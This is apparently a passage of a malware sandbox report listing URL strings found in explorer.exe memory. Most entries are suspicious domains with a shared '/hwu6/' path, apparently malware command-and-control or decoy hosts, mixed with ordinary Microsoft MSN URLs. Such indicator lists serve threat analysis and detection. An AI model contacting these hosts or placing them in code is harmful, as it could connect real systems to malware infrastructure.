Source: explorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000002.00000000.1668261446.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2695016953.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1665720759.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.04506.club
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.04506.club/hwu6/
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.04506.club/hwu6/www.maheshg.xyz
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.04506.clubReferer:
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.66sodovna.net
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.66sodovna.net/hwu6/
Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.66sodovna.net/hwu6/I:
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.66sodovna.net/hwu6/www.04506.club
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.66sodovna.netReferer:
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats/hwu6/
Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.6vay.boats/hwu6/www.66sodovna.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boatsReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzz/hwu6/www.inefity.cloud
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.8e5lr5i9zu.buzzReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/www.otzen.info
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.comReferer:
          Source: explorer.exe, 00000002.00000002.2700282302.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1669923079.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/www.ozzd86fih4.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.topReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.net/hwu6/www.66sodovna.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cloggedpipes.netReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.lf758.vip
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.stairr-lift-find.today
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.proReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bond/hwu6/www.8e5lr5i9zu.buzz
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dental-implants-83810.bondReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.online/hwu6/www.dental-implants-83810.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edmaker.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shop/hwu6/www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternityzon.shopReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/www.ux-design-courses-53497.bond
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.clubReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/www.bethlark.top
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloudReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.click/hwu6/www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lebahsemesta57.clickReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vip/hwu6/www.sugatoken.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lf758.vipReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shop/hwu6/www.edmaker.online
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.locerin-hair.shopReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyz/hwu6/www.eternityzon.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maheshg.xyzReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bond/hwu6/www.rider.vision
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.migraine-treatment-36101.bondReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.info/hwu6/www.migraine-treatment-36101.bond
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.otzen.infoReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.online/hwu6/www.6vay.boats
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozzd86fih4.onlineReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.vision/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rider.visionReferer:
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today/hwu6/
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.today/hwu6/www.cloggedpipes.net
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stairr-lift-find.todayReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sugatoken.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bond/hwu6/www.vytech.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ux-design-courses-53497.bondReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.locerin-hair.shop
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/www.lebahsemesta57.click
          Source: explorer.exe, 00000002.00000002.2702005203.000000000CB73000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.netReferer:
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3kP
          Source: explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmP
          Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1669923079.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2700282302.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008BBE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/4deyI
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 0000000E.00000002.2920536485.00000000079D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000000.1666389880.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?L
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000000.1666389880.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2919550460.0000000004CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 0000000E.00000002.2976289585.000000000897F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2758026440.0000000008996000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000002.00000000.1666389880.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 0000000E.00000003.2771147402.00000000078CA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
